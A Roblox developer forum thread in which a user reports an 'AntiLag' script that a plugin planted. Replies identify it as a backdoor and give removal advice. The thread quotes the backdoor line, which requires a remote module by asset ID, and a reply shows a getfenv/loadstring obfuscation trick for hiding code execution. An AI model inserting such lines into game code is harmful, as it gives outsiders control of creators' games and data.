Script called Anti-Lag

Greetings people of Developer Forum, I am frustrated that I keep seeing this weird script called AntiLag in the SSS (ServerScriptService).

Here it is:

And here is the script it contains:

require(4821417050):FireServer()

I’m getting thoughts that it is a backdoor or something like that.
Can someone please explain this to me and tell me if this script is in any of your games/baseplates.

Thanks, James

To any future person looking at this, the issue was a plugin. I don’t exactly recall the name but when I removed it the script was gone.

Remember to always check free models or plugins for backdoor scripts!

3 Likes

Delete The Script, Immediately. These scripts are essentially used for exploitation which is caused by backdoors in your games

2 Likes

It is a typical backdoor, just get an anti-backdoor if you use free models and plugins too often, or just follow the steps provided on other threads to get rid of backdoors (i.e search for keywords malicious code usually contains unless you’re not using any free models).

If you use no free models then isolate every plugin separately and see whether the script gets inserted.

Example of how getfenv() could be used:

getfenv()["\108\111\97\100\115\116\114\105\110\103"]('print("hello")')()

you can do much more with loadstring() than that.

1 Like

In addition to tjis if you don’t know how to find a backdoor here is a Post

Thanks guys, I will delete the script and hopefully find one of those anti backdoors.

The script used is this.
It’s not an alt.
The owner doesn’t looks trusty as half of the scripts I have found made by him are obfuscated or are exploits, like this script which is a DexExplorer.

You have either a malicious plugin or a free model. Either way - make sure you use only the most trusted of plugins and never use free models in an actual project.

Welp, thanks guys, I will try to review my plugins, and I dont really have any free models due to the fact that I’m practicing scripting :smiley:

That’s backdoor
[will probably steal data if you’ll keep it in your game]